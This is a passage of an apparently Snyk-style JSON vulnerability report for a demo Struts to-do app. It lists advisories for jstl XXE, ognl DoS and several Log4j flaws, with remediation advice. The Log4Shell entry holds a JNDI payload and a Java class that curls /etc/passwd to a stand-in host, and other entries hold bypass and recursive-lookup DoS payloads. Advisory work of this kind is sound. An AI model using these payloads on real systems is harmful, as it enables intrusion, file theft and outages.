Overview\n[javax.servlet:jstl](https://mvnrepository.com/artifact/javax.servlet/jstl) is a collection of useful JSP tags which encapsulates the core functionality common to many JSP applications.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. Apache Standard Taglibs before 1.2.3 allows remote attackers to execute arbitrary code or conduct external XML entity (XXE) attacks via a crafted XSLT extension in a `` or `` JSTL XML tag.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. 
For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `javax.servlet:jstl`.\n\n## References\n- [Apache Mail Archive](http://mail-archives.us.apache.org/mod_mbox/www-announce/201502.mbox/%3C82207A16-6348-4DEE-877E-F7B87292576A@apache.org%3E)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0254)\n- [RedHat CVE Database](https://access.redhat.com/security/cve/CVE-2015-0254)\n", + "epssDetails": { + "percentile": "0.94002", + "probability": "0.07046", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2015-0254" + ], + "CWE": [ + "CWE-94" + ], + "GHSA": [ + "GHSA-6x4w-8w53-xrvv" + ] + }, + "packageName": "javax.servlet:jstl", + "proprietary": false, + "creationTime": "2017-02-22T07:28:19.341000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2015-02-27T16:13:27Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "javax.servlet", + "artifactId": "jstl" + }, + "publicationTime": "2015-02-27T16:51:55Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:48.017447Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "javax.servlet:jstl@1.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "javax.servlet:jstl", + "version": "1.2" + }, + { + 
"id": "snyk:lic:maven:javax.servlet:jstl:CDDL-1.0", + "type": "license", + "title": "CDDL-1.0 license", + "semver": { + "vulnerable": [ + "[1.2,)" + ] + }, + "license": "CDDL-1.0", + "language": "java", + "description": "CDDL-1.0 license", + "packageName": "javax.servlet:jstl", + "creationTime": "2024-06-18T08:06:13.191Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T08:06:13.191Z", + "severity": "medium", + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "javax.servlet:jstl@1.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "javax.servlet:jstl", + "version": "1.2" + }, + { + "id": "SNYK-JAVA-OGNL-30474", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "Tao Wang" + ], + "semver": { + "vulnerable": [ + "[,3.0.12)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "3.0.12" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "ognl:ognl", + "references": [ + { + "url": "https://github.com/jkuhnert/ognl/commit/ae43073fbf38db8371ff4f8bf2a966ee3b5f7e92", + "title": "GitHub Commit" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3093", + "title": "NVD" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:46:50.033229Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:37.218889Z" + }, + { + "type": "secondary", + 
"vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:50.033229Z" + } + ], + "description": "## Overview\n[`ognl:ognl`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22ognl%22) is a simple Expression Language (EL) for Java.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) attacks.\nApache Struts 2.0.0 through 2.3.24.1 does not properly cache method references when used with OGNL before 3.0.12, which allows remote attackers to cause a denial of service (block access to a web site) via unspecified vectors.\n\n## Details\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\r\n\r\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\r\n\r\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\r\n\r\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\r\n\r\nTwo common types of DoS vulnerabilities:\r\n\r\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\r\n\r\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](npm:ws:20171108)\n\n## Remediation\nUpgrade `ognl:ognl` to version 3.0.12 or higher.\n\n## References\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3093)\n- [GitHub Commit](https://github.com/jkuhnert/ognl/commit/ae43073fbf38db8371ff4f8bf2a966ee3b5f7e92)\n", + "epssDetails": { + "percentile": "0.90602", + "probability": "0.02732", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-3093" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "ognl:ognl", + "proprietary": false, + "creationTime": "2017-02-22T07:28:19.659000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-06-02T02:16:48.918000Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "ognl", + "artifactId": "ognl" + }, + "publicationTime": "2016-06-02T02:16:48.918000Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:50.033229Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + "ognl:ognl@3.0.6" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.28", + "ognl:ognl@3.0.13" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "ognl:ognl", + "version": "3.0.6" + }, + { + "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2314720", + "title": "Remote Code Execution (RCE)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H", + "credit": [ + "Chen Zhaojun of Alibaba Cloud Security Team" + ], + "semver": { + "vulnerable": [ + "[2.0-beta9,2.3.1)", + "[2.4,2.12.2)", + "[2.13.0,2.15.0)" + ] + }, + "exploit": "High", + "fixedIn": [ + "2.3.1", + "2.12.2", + "2.15.0" + ], + "patches": [], + "insights": { 
+ "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 10, + "functions": [ + { + "version": [ + "[2.0-beta9,2.3.1)", + "[2.4,2.12.2)", + "[2.13.0,2.15.0)" + ], + "functionId": { + "filePath": "org/apache/logging/log4j/core/lookup/JndiLookup.java", + "className": "JndiLookup", + "functionName": "lookup" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.logging.log4j:log4j-core", + "references": [ + { + "url": "https://issues.apache.org/jira/browse/LOG4J2-3198", + "title": "Apache Jira Issues" + }, + { + "url": "https://issues.apache.org/jira/browse/LOG4J2-3201", + "title": "Apache Jira Issues" + }, + { + "url": "https://logging.apache.org/log4j/2.x/security.html", + "title": "Apache Security Advisory" + }, + { + "url": "https://github.com/apache/logging-log4j2/pull/608", + "title": "GitHub PR" + }, + { + "url": "https://github.com/Kirill89/log4shell-vulnerable-server", + "title": "PoC" + }, + { + "url": "https://snyk.io/blog/log4j-rce-log4shell-vulnerability-cve-2021-4428/", + "title": "Snyk Blog and Vulnerability Breakdown" + }, + { + "url": "https://www.exploit-db.com/exploits/51183", + "title": "Exploit DB" + }, + { + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", + "title": "CISA - Known Exploited Vulnerabilities" + }, + { + "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-44228.yaml", + "title": "Nuclei Templates" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", + "cvssV3BaseScore": 10, + "modificationTime": "2024-03-11T09:48:46.605332Z" + }, + { + "assigner": "Red Hat", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:53:58.520882Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 10, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:43.264835Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 10, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:46.605332Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:58.520882Z" + } + ], + "description": "## Overview\n\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE).\nApache Log4j2 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.\r\n\r\nFrom log4j 2.15.0, JNDI LDAP endpoints are restricted to localhost by default.\r\n\r\n\r\n## PoC\r\nWhen an application uses log4j to log user input, an attacker can exploit this vulnerability, by supplying a malicious string that the application logs - for example, `${jndi:ldap://someurl/Evil}`. 
This causes the application to execute a malicious class supplied by an attacker’s LDAP server (`someurl/Evil` in this example).\r\n\r\nFor example, the vulnerability can be used to inject this malicious class into an application:\r\n```java\r\npublic class Evil implements ObjectFactory {\r\n @Override\r\n public Object getObjectInstance (Object obj, Name name, Context nameCtx, Hashtable environment) throws Exception {\r\n Runtime.getRuntime().exec(\"curl -F 'file=@/etc/passw‍đ' https://someurl/upload\");\r\n return null;\r\n }\r\n}\r\n```\r\nThis causes the application to disclose the `etc/passwd` file on the system, and send it to a remote attacker.\r\n\r\n## Further Remediation Options\r\nIf upgrading the version is not possible, we strongly recommend to mitigate the vulnerability using one of these methods:\r\n\r\n* Remove `JndiLookup.class` from the class path (i.e: `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`. While not pertinent to log4shell, consider also removing `JndiManager`, `JMSAppender` and `SMTPAppender` if you are not using them, as there are unconfirmed reports they could be leveraged in similar attacks in the future.\r\n* Partial mitigation: disable lookups via system properties or environmental variables. If you use log4j >=2.10.0, you can set the system property `LOG4J_FORMAT_MSG_NO_LOOKUPS` or the environmental variable `Dlog4j2.formatMsgNoLookups` to `true`. (RCE is possible in some non-default Pattern Layout configurations that use a Context Lookup or a Thread Context Map pattern.)\r\n\r\n
Upgrading your JDK versions is not enough to mitigate this vulnerability in all circumstances, as it was proven that setting the `com.sun.jndi.ldap.object.trustURLCodebase` property to `false` is not enough.\r\n
For more remediation advice, please visit the [Log4j Remediation Cheat Sheet](https://snyk.io/blog/log4shell-remediation-cheat-sheet/) post.\r\n\r\n\r\n**Note**: `org.apache.logging.log4j:log4j-api` was originally deemed vulnerable, but Apache maintainers have since [clarified](https://issues.apache.org/jira/browse/LOG4J2-3201) that this only affects `org.apache.logging.log4j:log4j-core`.\n\n## Remediation\n\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.1, 2.12.2, 2.15.0 or higher.\n\n\nUse [this guide](https://snyk.io/blog/find-fix-log4shell-quickly-snyk/) to scan your projects for the Log4Shell vulnerability.\n\n## References\n\n- [Apache Jira Issues](https://issues.apache.org/jira/browse/LOG4J2-3198)\n\n- [Apache Jira Issues](https://issues.apache.org/jira/browse/LOG4J2-3201)\n\n- [Apache Security Advisory](https://logging.apache.org/log4j/2.x/security.html)\n\n- [GitHub PR](https://github.com/apache/logging-log4j2/pull/608)\n\n- [PoC](https://github.com/Kirill89/log4shell-vulnerable-server)\n\n- [Snyk Blog and Vulnerability Breakdown](https://snyk.io/blog/log4j-rce-log4shell-vulnerability-cve-2021-4428/)\n\n- [Exploit DB](https://www.exploit-db.com/exploits/51183)\n\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-44228.yaml)\n", + "epssDetails": { + "percentile": "0.99999", + "probability": "0.97556", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-44228" + ], + "CWE": [ + "CWE-94" + ], + "GHSA": [ + "GHSA-jfh8-c2jp-5v3q" + ] + }, + "packageName": "org.apache.logging.log4j:log4j-core", + "proprietary": false, + "creationTime": "2021-12-10T10:08:46.155884Z", + "functions_new": [ + { + "version": [ + "[2.0-beta9,2.3.1)", + "[2.4,2.12.2)", + "[2.13.0,2.15.0)" + ], + "functionId": { + "className": "org.apache.logging.log4j.core.lookup.JndiLookup", + 
"functionName": "lookup" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-12-10T10:02:55Z", + "exploitDetails": { + "sources": [ + "CISA", + "ExploitDB", + "Nuclei Templates", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Attacked", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.logging.log4j", + "artifactId": "log4j-core" + }, + "publicationTime": "2021-12-10T10:10:01Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:25.500242Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.logging.log4j:log4j-core@2.7" + ], + "upgradePath": [ + false, + "org.apache.logging.log4j:log4j-core@2.12.2" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.logging.log4j:log4j-core", + "version": "2.7" + }, + { + "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2320014", + "title": "Remote Code Execution (RCE)", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H/RL:O/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.0-beta9,2.3.1)", + "[2.4,2.12.2)", + "[2.13.0,2.16.0)" + ] + }, + "exploit": "High", + "fixedIn": [ + "2.3.1", + "2.12.2", + "2.16.0" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.logging.log4j:log4j-core", + "references": [ + { + "url": "https://lists.apache.org/thread/83y7dx5xvn3h5290q1twn16tltolv88f", + "title": "Apache Pony Mail" + }, + { + "url": "https://logging.apache.org/log4j/2.x/security.html", + "title": "Apache Security Page" + }, + { + "url": "https://twitter.com/marcioalm/status/1471740771581652995", + "title": "Twitter Post" + }, + { + "url": 
"https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-45046.yaml", + "title": "Nuclei Templates" + }, + { + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", + "title": "CISA - Known Exploited Vulnerabilities" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", + "cvssV3BaseScore": 9, + "modificationTime": "2024-03-11T09:51:51.455756Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:56.296034Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:32.295395Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:51.455756Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:56.296034Z" + } + ], + "description": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE) if one of the following conditions is met:\r\n\r\n1. Logging configuration explicitly enables lookups – either by default (if using a version lower than 2.15.0) or manually by using `%m{lookups}` as `formatMsgNoLookups` is switched on by default as of version 2.15.0.\r\n2. 
Or uses a non-default Pattern Layout with Context Lookup where attackers can control input data via Thread Context Map (MDC),\r\n3. Or uses `Logger.printf(\"%s\", userInput)` function where attackers can control the userInput variable.\r\n\r\nA malicious actor is able to bypass the mitigation implemented in version 2.15.0 that limits JNDI lookups to localhost only: `${jndi:ldap://127.0.0.1#evilhost.com:1389/a}`.\r\n\r\nWe recommend updating to version 2.16.0 which completely disables JNDI lookups by default. If upgrading is not an option, this issue can be mitigated in prior releases by removing the `JndiLookup` class from the classpath (example: `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`).\r\n\r\n### PoC\r\n\r\nIn config:\r\n```\r\n%d %p %c{1.} [%t] $${ctx:loginId} %m%n\r\n```\r\n\r\nIn code:\r\n```java\r\nThreadContext.put(\"loginId\", UserControlledInput);\r\n```\r\n\r\n### History\r\n\r\nThis vulnerability was previously assigned a CVSS score of 3.7 (Low), and the impact was believed to be Denial of Service (DoS).\r\n\r\nFurthermore, the advisory previously mentioned Thread Context Map patterns (%X, %mdc, or %MDC) as being vulnerable to this issue, but that has since been proven wrong.\r\n\r\nOn December 17, 2021 new information came to light, demonstrating that an Arbitrary Code Execution vulnerability still exists in version 2.15.0 of Log4j due to a bypass to the localhost-only lookup mechanism.\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.1, 2.12.2, 2.16.0 or higher.\n## References\n- [Apache Pony Mail](https://lists.apache.org/thread/83y7dx5xvn3h5290q1twn16tltolv88f)\n- [Apache Security Page](https://logging.apache.org/log4j/2.x/security.html)\n- [Twitter Post](https://twitter.com/marcioalm/status/1471740771581652995)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-45046.yaml)\n- [CISA - Known Exploited 
Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n", + "epssDetails": { + "percentile": "0.99913", + "probability": "0.97364", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-45046" + ], + "CWE": [ + "CWE-94" + ], + "GHSA": [ + "GHSA-7rjr-3q55-vv33" + ] + }, + "packageName": "org.apache.logging.log4j:log4j-core", + "proprietary": false, + "creationTime": "2021-12-14T18:28:31.339218Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2021-12-14T18:01:28Z", + "exploitDetails": { + "sources": [ + "CISA", + "Nuclei Templates", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Attacked", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.logging.log4j", + "artifactId": "log4j-core" + }, + "publicationTime": "2021-12-14T18:44:00Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:25.837600Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.logging.log4j:log4j-core@2.7" + ], + "upgradePath": [ + false, + "org.apache.logging.log4j:log4j-core@2.12.2" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.logging.log4j:log4j-core", + "version": "2.7" + }, + { + "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2321524", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", + "credit": [ + "Hideki Okamoto of Akamai Technologies" + ], + "semver": { + "vulnerable": [ + "[2.0-beta9,2.3.1)", + "[2.4,2.12.3)", + "[2.13.0,2.17.0)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.3.1", + "2.12.3", + "2.17.0" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [], + 
"malicious": false, + "isDisputed": false, + "moduleName": "org.apache.logging.log4j:log4j-core", + "references": [ + { + "url": "https://logging.apache.org/log4j/2.x/security.html", + "title": "Apache Security" + }, + { + "url": "https://issues.apache.org/jira/browse/LOG4J2-3230", + "title": "JIRA Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 5.9, + "modificationTime": "2024-03-11T09:51:51.570474Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 5.9, + "modificationTime": "2024-03-11T09:53:58.516498Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:38.288854Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:51.570474Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:58.516498Z" + } + ], + "description": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). Does not protect against uncontrolled recursion from self-referential lookups. 
\r\n\r\nWhen the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, `$${ctx:loginId}`), attackers with control over Thread Context Map (MDC) input data can craft malicious input data that contains a recursive lookup, resulting in a `StackOverflowError` that will terminate the process.\r\n\r\n### PoC\r\n\r\nIn `log4j.properties`:\r\n```java\r\nappender.console.type = Console\r\nappender.console.name = console\r\nappender.console.layout.type = PatternLayout\r\nappender.console.layout.pattern = !${ctx:test}! %m%n\r\nrootLogger.level = ALL\r\nrootLogger.appenderRef.file.ref = console\r\n```\r\n\r\nIn `Main.java`:\r\n```java\r\nThreadContext.put(\"test\", \"${::-${ctx:test}}\");\r\nlogger.error(\"boom\"); // Will not be logged\r\n```\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.1, 2.12.3, 2.17.0 or higher.\n## References\n- [Apache Security](https://logging.apache.org/log4j/2.x/security.html)\n- [JIRA Issue](https://issues.apache.org/jira/browse/LOG4J2-3230)\n", + "epssDetails": { + "percentile": "0.99624", + "probability": "0.96524", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-45105" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "org.apache.logging.log4j:log4j-core", + "proprietary": false, + "creationTime": "2021-12-17T18:23:58.542986Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2021-12-17T18:20:21Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.logging.log4j", + "artifactId": "log4j-core" + }, + "publicationTime": "2021-12-18T07:05:00Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:58.516498Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.logging.log4j:log4j-core@2.7" + ], + "upgradePath": [ + false, + "org.apache.logging.log4j:log4j-core@2.12.3" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.logging.log4j:log4j-core", + "version": "2.7" + }, + { + "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2327339", + "title": "Arbitrary Code Execution", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H/E:P", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.0-beta7,2.3.2)", + "[2.4,2.12.4)", + "[2.13.0,2.17.1)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.3.2", + "2.12.4", + 
